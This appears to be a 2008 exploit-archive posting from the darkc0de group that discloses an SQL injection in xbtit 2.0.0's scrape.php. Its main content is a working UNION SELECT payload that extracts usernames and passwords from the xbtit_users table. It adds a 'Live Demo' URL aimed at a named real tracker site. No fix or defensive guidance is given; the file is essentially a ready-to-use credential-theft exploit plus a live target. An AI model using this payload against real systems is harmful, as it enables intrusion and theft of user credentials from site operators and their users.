Home / exploits xbtit-sql.txt
Posted on 29 September 2008
################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ _ __| _/____ # # / __ |\__ \_ __ |/ // ___/ /_ / __ |/ __ # # / /_/ | / __ | | / < \___ \_/ / /_/ ___/ # # \____ |(______/__| |__|_ \_____>\_____ /\_____|\____ # # / / / # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ / / / # # \___| | / ___/ / # # \___ >__| \___ >/\_/ # # est.2007 / / forum.darkc0de.com # ################################################################ # --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z -beenu- DON # #-OutLawz- P47tr1ck- FeDeReR- MAGE- JeTFyrE-FunctionSys-jappan # # and all darkc0de & NikTrix members --# ################################################################ # # Author: r45c4l # # Home : www.darkc0de.com # # Email : r45c4l@hotmail.com # # Share the c0de! # ################################################################ # # Title: xbtit 2.0.0 (scrape.php?info_hash) SQL Injection # # # Vendor: http://www.btiteam.org/ # # # ########################################################### # # d0rk:n/a # # ########################################################### POC 1: http://site.com/scrape.php?info_hash=1%27)+UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0+FROM+xbtit_users/* Live Demo: http://tracker.powerrangers.ru/scrape.php?info_hash=1%27)+UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0+FROM+xbtit_users/* ########################################################### # # Bug discovered : 29 Sep.2008 ###########################################################
